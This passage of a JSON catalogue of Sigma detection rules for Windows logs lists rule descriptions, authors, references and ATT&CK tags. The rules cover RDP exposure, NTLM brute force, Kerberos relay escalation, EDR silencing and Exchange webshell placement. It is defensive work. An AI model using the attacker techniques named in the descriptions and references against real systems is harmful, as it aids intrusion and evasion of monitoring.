"https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] 
}, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b237c54b-0f15-4612-a819-44b735e0de27", "value": "A Security-Enabled Global Group Was Deleted" }, { "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.", "meta": { "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate or intentional inbound connections from public IP addresses on the RDP port." ], "filename": "win_security_successful_external_remote_rdp_login.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1133", "attack.t1078", "attack.t1110" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2", "value": "External Remote RDP Logon from Public IP" }, { "description": "Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local 
Administrator account.\nThis may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.\n", "meta": { "author": "Elastic, @SBousseaden", "creation_date": "2022-04-27", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_privesc_kerberos_relay_over_ldap.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", "https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_privesc_kerberos_relay_over_ldap.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "value": "Potential Privilege Escalation via Local Kerberos Relay over LDAP" }, { "description": "Detects logon events that specify new credentials", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Legitimate remote administration activity" ], "filename": "win_security_susp_logon_newcredentials.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement", "attack.t1550" ] }, "related": [ { 
"dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", "value": "Outgoing Logon with New Credentials" }, { "description": "Detects activity when a member is removed from a security-enabled global group", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2023-04-26", "falsepositive": [ "Unknown" ], "filename": "win_security_member_removed_security_enabled_global_group.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02c39d30-02b5-45d2-b435-8aebfe5a8629", "value": "A Member Was Removed From a Security-Enabled Global Group" }, { "description": "Detects activity when a member is added to a security-enabled global group", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2023-04-26", "falsepositive": [ "Unknown" ], "filename": "win_security_member_added_security_enabled_global_group.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", 
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c43c26be-2e87-46c7-8661-284588c5a53e", "value": "A Member Was Added to a Security-Enabled Global Group" }, { "description": "Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.\nAdversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.\n", "meta": { "author": "@gott_cyber", "creation_date": "2024-01-08", "falsepositive": [ "Unlikely" ], "filename": "win_security_wfp_endpoint_agent_blocked.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/netero1010/EDRSilencer", "https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983", "https://github.com/amjcyber/EDRNoiseMaker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bacf58c6-e199-4040-a94f-95dea0f1e45a", "value": "Windows Filtering Platform Blocked Connection From 
EDR Agent Binary" }, { "description": "Detects the load of a revoked kernel driver", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_revoked_driver_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "320fccbf-5e32-4101-82b8-2679c5f007c6", "value": "CodeIntegrity - Revoked Kernel Driver Loaded" }, { "description": "Detects loaded kernel modules that did not meet the WHQL signing requirements.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_whql_failure.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f", "value": "CodeIntegrity - 
Unmet WHQL Requirements For Loaded Kernel Module" }, { "description": "Detects image load events with revoked certificates by code integrity.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_revoked_image_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "881b7725-47cc-4055-8000-425823344c59", "value": "CodeIntegrity - Revoked Image Loaded" }, { "description": "Detects blocked image load events with revoked certificates by code integrity.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_revoked_image_blocked.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": 
"6f156c48-3894-4952-baf0-16193e9067d2", "value": "CodeIntegrity - Blocked Image Load With Revoked Certificate" }, { "description": "Detects block events for files that are disallowed by code integrity for protected processes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_blocked_protected_process_file.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "5daf11c3-022b-4969-adb9-365e6c078c7c", "value": "CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked" }, { "description": "Detects the presence of a loaded unsigned kernel module on the system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_unsigned_driver_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "951f8d29-f2f6-48a7-859f-0673ff105e6f", "value": "CodeIntegrity - Unsigned Kernel Module Loaded" }, { "description": "Detects blocked load attempts of revoked drivers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unknown" ], "filename": "win_codeintegrity_revoked_driver_blocked.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", "value": "CodeIntegrity - Blocked Driver Load With Revoked Certificate" }, { "description": "Detects loaded unsigned image on the system", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_unsigned_image_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "c92c24e7-f595-493f-9c98-53d5142f5c18", "value": "CodeIntegrity - Unsigned Image Loaded" }, { "description": "Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.\nThis event is best correlated with EID 3089 to determine the error of the validation.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-20", "falsepositive": [ "Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule." 
], "filename": "win_codeintegrity_attempted_dll_load.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" ], "tags": [ "attack.execution" ] }, "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", "value": "CodeIntegrity - Unmet Signing Level Requirements By File Under Validation" }, { "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-10", "falsepositive": [ "Unknown" ], "filename": "win_codeintegrity_enforced_policy_block.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", "https://twitter.com/wdormann/status/1590434950335320065", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", "value": "CodeIntegrity - Blocked Image/Driver Load For Policy Violation" }, { "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", "meta": { "author": "James Pemberton", "creation_date": "2020-05-22", "falsepositive": [ "Host connections to valid domains, exclude these.", "Host connections not using host FQDN.", "Host connections to external legitimate domains." ], "filename": "win_susp_ntlm_rdp.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "n/a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "value": "Potential Remote Desktop Connection to Non-Domain Host" }, { "description": "Detects common NTLM brute force device names", "meta": { "author": "Jerry Shockley '@jsh0x'", "creation_date": "2022-02-02", "falsepositive": [ "Systems with names equal to the spoofed ones used by the brute force tools" ], "filename": "win_susp_ntlm_brute_force.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.varonis.com/blog/investigate-ntlm-brute-force", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" ], "tags": 
[ "attack.credential-access", "attack.t1110" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "value": "NTLM Brute Force" }, { "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-08", "falsepositive": [ "Legacy hosts" ], "filename": "win_susp_ntlm_auth.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/1004895028995477505", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" ], "tags": [ "attack.lateral-movement", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", "value": "NTLM Logon" }, { "description": "Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", "falsepositive": [ "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). 
Exclude all the specific trusted tasks before using this rule" ], "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "value": "Scheduled Task Executed Uncommon LOLBIN" }, { "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities\n", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Unknown" ], "filename": "win_taskscheduler_susp_schtasks_delete.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "value": "Important Scheduled Task Deleted" }, { "description": "Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or it's an unusual program to be run from a Scheduled Task", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-05", 
"falsepositive": [ "Unknown" ], "filename": "win_taskscheduler_execution_from_susp_locations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", "value": "Scheduled Task Executed From A Suspicious Location" }, { "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", "meta": { "author": "Jose Rodriguez @Cyb3rPandaH", "creation_date": "2021-03-15", "falsepositive": [ "Unknown" ], "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/OTR_Community/status/1371053369071132675", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", "value": "Exchange Set OabVirtualDirectory ExternalUrl Property" }, { "description": "Detects the Installation of a Exchange Transport Agent", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "filename": "win_exchange_transportagent.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" ], "tags": [ "attack.persistence", "attack.t1505.002" ] }, "related": [ { "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "value": "MSExchange Transport Agent Installation - Builtin" }, { "description": "Detects a failed installation of a Exchange Transport Agent", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "filename": "win_exchange_transportagent_failed.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" ], "tags": [ "attack.persistence", "attack.t1505.002" ] }, "related": [ { "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "value": "Failed MSExchange Transport Agent Installation" }, { "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", "meta": { "author": "Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unlikely" ], "filename": "win_exchange_proxyshell_mailbox_export.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", "value": "Mailbox Export to Exchange Webserver" }, { "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "meta": { "author": "Christian Burkard (Nextron Systems)", 
"creation_date": "2021-08-27", "falsepositive": [ "Unknown" ], "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "value": "Remove Exported Mailbox from Exchange Webserver" }, { "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unlikely" ], "filename": "win_exchange_proxylogon_oabvirtualdir.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" ], "tags": [ "attack.t1587.001", "attack.resource-development" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "value": "ProxyLogon MSExchange OabVirtualDirectory" }, { "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx 
name suffix which can be used to place a webshell", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unlikely" ], "filename": "win_exchange_proxyshell_certificate_generation.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/GossiTheDog/status/1429175908905127938", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", "value": "Certificate Request Export to Exchange Webserver" }, { "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "filename": "win_hybridconnectionmgr_svc_running.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" ], "tags": [ "attack.persistence", "attack.t1554" ] }, "related": [ { "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", "value": "HybridConnectionManager Service Running" }, { "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unknown" ], "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" 